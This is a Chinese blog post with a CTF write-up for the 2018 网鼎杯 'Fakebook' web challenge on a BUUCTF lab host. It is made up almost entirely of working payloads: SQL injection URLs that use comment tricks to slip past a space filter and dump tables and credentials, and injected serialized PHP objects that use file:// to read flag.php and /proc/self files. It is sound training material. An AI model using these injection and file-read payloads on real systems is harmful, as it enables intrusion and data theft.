网鼎2018 fakebook

最新推荐文章于 2023-11-30 18:08:32 发布
最新推荐文章于 2023-11-30 18:08:32 发布
阅读量308 收藏
点赞数 1
分类专栏: CTF PHP
本文为博主原创文章,未经博主允许不得转载,否则追究法律责任。
本文链接:https://blog.csdn.net/yiqiushi4748/article/details/108360102
版权
CTF 同时被 2 个专栏收录
44 篇文章 6 订阅
订阅专栏
PHP
36 篇文章 1 订阅
订阅专栏
本文深入探讨了SQL注入攻击的技术细节,包括如何利用文件泄露和curl进行攻击,通过构造特定的SQL语句绕过WAF过滤,实现数据库、表和字段的信息获取,以及数据的注入。同时,介绍了如何利用序列化存储的特性进行更复杂的操作。
摘要由CSDN通过智能技术生成

 

  1. 文件泄露

 

 

 

 

user.php.bak

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/user.php.bak

 

 

 

在其中发现curl

 

 

  • sql注入

 

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=1'

字段数

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=1 order by 4 --+

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=1 order by 5 --+

 

存在waf过滤 过滤空格

 

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=-1/**/uNion/**/sElect/**/1,2,3,4--+

 

爆数据库

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=-1/**/uNion/**/sElect/**/1,database(),3,4--+

爆表

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=-1/**/uNion/**/sElect/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3,4--+

爆字段

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=-1/**/uNion/**/sElect/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'),3,4--+

//no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

注入数据

http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=-1/**/uNion/**/sElect/**/1,(select/**/group_concat(no,username,passwd,data)/**/from/**/users),3,4--+

 

//1wen877c8d1c431504fb99fec6c4ba67d927434f252845ea4308d77d5131353c31f5b18f2f26eac641903953ab0b679c5e92b0cb83af6a576a745cb78363dcd1b8e2O:8:"UserInfo":3:{s:4:"name";s:3:"wen";s:3:"age";i:111;s:4:"blog";s:16:"http://baidu.com";}

 

发现data的数据为序列化存储。我们直接select 第四个位置,放入我们的payload,但是需要用单引号!!!

 

 

骚操作1

 

http://2e6784a7-9d31-4c19-88f6-abeedad8b01d.node3.buuoj.cn/view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"wen";s:3:"age";i:111;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'--+

查看源代码base64解密

$flag = "flag{07afbbfd-77b4-411c-9d45-3586c9f106cf}";

 

姿势2

proc/self知识

 

view-source:http://2e6784a7-9d31-4c19-88f6-abeedad8b01d.node3.buuoj.cn/view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"wen";s:3:"age";i:111;s:4:"blog";s:30:"file:///proc/self/cwd/flag.php";}'--+

 

//src='data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiZmxhZ3swN2FmYmJmZC03N2I0LTQxMWMtOWQ0NS0zNTg2YzlmMTA2Y2Z9IjsNCmV4aXQoMCk7DQo='></div>

 

 

姿势3  非预期

 

现在环境关了

/view.php?no=-1/**/union/**/select/**/1,load_file(%27/var/www/html/view.php%27),3,4--+

 

 

 

 

偷一个月亮
关注
专栏目录
[网鼎2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1787
[网鼎2018]Fakebook 解题思路&过程
网鼎2018 Fakebook
weixin_45751765的博客
10-01 1608
1NDEX0x00 初试0x01 复现 0x00 初试 一开始有两个选项:一个join,一个login 此处blog存在过滤 注册完返回首页发现username栏是超链接 单击后发现 url–> http://47bdcd94-3a3d-4ae5-af77-4390d01fd436.node4.buuoj.cn:81/view.php?no=1 盲猜是注入(讲真我一开始真没有意识先去判断是数字型注入还是字符型注入) 因为手注测试的时候十分的奇怪… 先通过updatexml报错注入得到一些信息 注注
[网鼎2018]Fakebook
m0_62905261的博客
08-12 260
[网鼎2018]Fakebook
[网鼎2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3981
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
[⽹鼎杯 2018]Fakebook
最新发布
zzqzzq11的博客
11-30 778
⼀共有:fakebook,information_schema,mysql,performance_schema,test 这些库。过滤字符:select 但是通过%0bselect直接绕过了。有⼀个no可以被注⼊的样⼦。
题解:BUUCTF [网鼎2018]Fakebook 1
qq_62886656的博客
06-14 756
题解
2020年IEEE Fellow刚刚揭榜!超70名华人入选
ConferenceEye的博客
11-28 2297
本文转载自新智元 今天,2020年IEEE Fellow名单正式公布,一共新增282名Fellow。华人约75人当选、其中中国大陆23人当选。当选的中国大陆 Fellow来自清华大学、北京大学、上海交大、电子科技大学等机构。 在新的名单中,我们看到了一些非常熟悉的名字:京东集团副总裁、京东人工智能事业部总裁周伯文;北京大学博雅特聘教授,前沿计算研究中心执行主任陈宝权;百度商业智能实验室主任、百度...
Web安全新手入门学习Week9
m0_59271033的博客
04-11 2931
新手入门Web安全
WebAssembly已支持所有主流浏览器
LiveVideoStack
11-17 8269
Firefox Quantum、Safari、Edge和Chrome一并支持WebAssembly,可以接近原生速度运行Web应用程序。点击【阅读原文】获取原文地址。 作者:Judy DeMocker 译者:王鸿蒙 审校:包研 虽然Mozilla已经准备推出旗下最快的浏览器Firefox Quantum,但WebAssembly还是有一些值得注意的改进——它支持Java
安装Ubuntu13.10 必做的事情 - Saucy Salamander(活泼的蝾螈)
T.s.road
11-09 729
已于10月17日发布的 Ubuntu 13.10 Saucy Salamander,有着许多新的显著特点、较多的更新及明显的性能改进。这篇简短的操作手册(how-to)将会讨论在日常的使用中怎么样进一步提升Ubuntu 13.10的性能。 如果你已经装有Ubuntu以前的版本,想升级到最新的13.10的话,请参照着我们的指南一步一步操作。升级到Ubuntu 13.10 Saucy Salaman
CTF[网鼎杯]Fakebook
她叫常玉莹
08-25 675
robots中发现 user.php.bak文件 下载文件 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age;
[网鼎2018]Fakebook(ssrf漏洞)
qq_44657899的博客
03-16 4789
因为是看了wp才做出来的,所以就直接记录过程和知识点了。 知识点:SSRF SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请...
【网络安全 | CTF】fakebook网鼎2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
BUUCTF__[网鼎2018]Fakebook_题解
风过江南乱的博客
07-04 2139
BUUCTF__[网鼎2018]Fakebook_题解
[原题复现][网鼎2018] WEB Fakebook(SSRF、反序列化、SQL注入)
笑花大王
02-27 2722
简介 原题复现: 考察知识点:SSRF、反序列化、SQL注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 分析了整体结构 点击jion可以添加账号还有博客地址添加OK之后会有ifram把你的博客地址引用到当前页面 jion添加的信息点击进入发现了get注入点 注入进去没flag 不过在da...
网鼎杯一道web题(fakebook
热门推荐
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
网鼎2018CTF第四场 _Crypto
Rorschach:Blog
08-30 1944
0x0 shenyue 理清代码流程,按照给的注册流程跑一遍 ==== administration console ==== 1. sign up 2. log in 3. private key generation -1. command execution &gt; 1 id: 123 pw: 123 successfully registered &gt; 2 id: 123 pw:...
Facebook社交网络架构解析
"Facebook的架构设计" Facebook是全球最大的社交网络平台之一,其背后复杂的架构设计使其能够处理海量的数据和用户交互。以下是Facebook架构的一些关键点: **1. 社交图(Social Graph)** Facebook的核心是社交图...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值